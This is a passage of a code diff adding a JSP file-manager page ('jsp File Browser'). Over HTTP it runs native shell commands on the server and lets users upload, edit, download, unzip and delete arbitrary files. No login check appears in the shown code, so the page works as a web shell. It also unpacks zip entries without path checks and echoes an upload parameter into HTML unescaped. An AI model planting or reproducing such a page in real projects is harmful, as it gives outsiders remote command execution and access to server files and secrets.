dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println("" + conv2Html(entry.getName()) + + ""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) 